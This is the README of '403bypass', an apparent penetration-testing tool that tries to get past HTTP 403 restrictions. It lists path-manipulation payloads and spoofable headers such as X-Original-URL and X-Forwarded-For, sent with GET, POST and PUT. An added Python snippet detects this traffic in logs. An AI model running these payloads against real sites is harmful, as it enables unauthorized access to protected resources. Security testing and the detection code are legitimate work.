https://github.com/felipecaon/403bypass

A tool that automates 403 bypassing techniques.

# 403bypass

A tool that automates 403 bypassing techniques.
The script ignores responses where the status code is 404 or 403; because of that, the output can be a bit large.

# Usage

```bash
echo "https://target.com/this/is/a/403/page" | 403bypass
```

```bash
cat urls.txt | 403bypass
```

# Installation

1 - Install httpx (https://github.com/projectdiscovery/httpx) (used for HTTP validation and for grabbing the status code and response size)

2 - `curl https://raw.githubusercontent.com/felipecaon/403bypass/main/403bypass.sh > /usr/local/bin/403bypass`

3 - `chmod +x /usr/local/bin/403bypass`

# Workflow

Generates a list of known payloads:

```
http://example.com
http://example.com/.
http://example.com/./
http://example.com/*
http://example.com..;/
http://example.com;/
http://example.com/%20
http://example.com/%2e
http://example.com/~
http://example.com/%09
http://example.com/.json
http://example.com/
http://example.com.json
http://.com
http://example.com/.;/
http://example.com/#
http://example.com/?gg
http://example.com/%20/
http://example.com/%2e/
http://example.com/./
http://example.com//
https://example.com
```

The payloads above are requested using the `GET`, `POST` and `PUT` methods. Additionally, every request is made using a potentially vulnerable header from the list:

## Headers:
```
X-Forwarded-For
X-Forwarded-Host
X-Custom-IP-Authorization
X-Custom-IP-Authorization+..;/
X-Original-URL
X-Rewrite-URL
X-Originating-IP
X-Remote-IP
X-Client-IP
X-Host
X-Remote-Addr
```
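For defenders, the traffic this workflow produces is easy to recognise in request logs. The following is an added example, not part of 403bypass: it flags requests whose path ends in one of the listed payload suffixes or that carry one of the listed headers, then reports clients that do so repeatedly across methods. The event tuple layout, the threshold and the sample data are assumptions, and the logs are assumed to be taken at the edge, where clients are not expected to send these headers themselves.

```python
import re
from collections import defaultdict

# Header names taken from the README's list; assumed not to be sent by
# legitimate clients directly to the edge (no trusted proxy in front).
SPOOF_HEADERS = {h.lower() for h in (
    "X-Forwarded-For", "X-Forwarded-Host", "X-Custom-IP-Authorization",
    "X-Original-URL", "X-Rewrite-URL", "X-Originating-IP", "X-Remote-IP",
    "X-Client-IP", "X-Host", "X-Remote-Addr")}

# Path endings from the README's payload list that normal clients rarely produce.
SUFFIX_RE = re.compile(
    r"(?:/\.|/\./|/\*|\.\.;/|/\.;/|;/|/~|//|/?%(?:20|2e|09)/?)$", re.I)

def reasons(raw_path, header_names):
    """Return the reasons one request resembles the tool's traffic."""
    found = []
    path = raw_path.split("?", 1)[0]  # match on the path, not the query string
    if SUFFIX_RE.search(path):
        found.append("path-suffix")
    hits = SPOOF_HEADERS & {h.lower() for h in header_names}
    if hits:
        found.append("header:" + ",".join(sorted(hits)))
    return found

def suspicious_clients(events, threshold=3):
    """Clients with >= threshold flagged requests spanning more than one method."""
    count, methods = defaultdict(int), defaultdict(set)
    for ip, method, path, headers in events:
        if reasons(path, headers):
            count[ip] += 1
            methods[ip].add(method)
    return sorted(ip for ip in count
                  if count[ip] >= threshold and len(methods[ip]) > 1)

# Constructed sample events: (client IP, method, raw path, request header names).
SAMPLE = [
    ("198.51.100.7", "GET", "/admin/.", ["Host", "X-Original-URL"]),
    ("198.51.100.7", "POST", "/admin/%2e/", ["Host", "X-Client-IP"]),
    ("198.51.100.7", "PUT", "/admin..;/", ["Host", "X-Rewrite-URL"]),
    ("203.0.113.20", "GET", "/docs/index.html", ["Host", "User-Agent"]),
    ("203.0.113.20", "GET", "/api/items?page=2", ["Host", "Accept"]),
]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE))
```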

# Contributing

Feel free to open an issue or PR with additional payloads.

# Credits

Main structure is made by Raywando, https://github.com/Raywando/4xxbypass

For a more complete set, go to https://github.com/cyal1/bypass-40x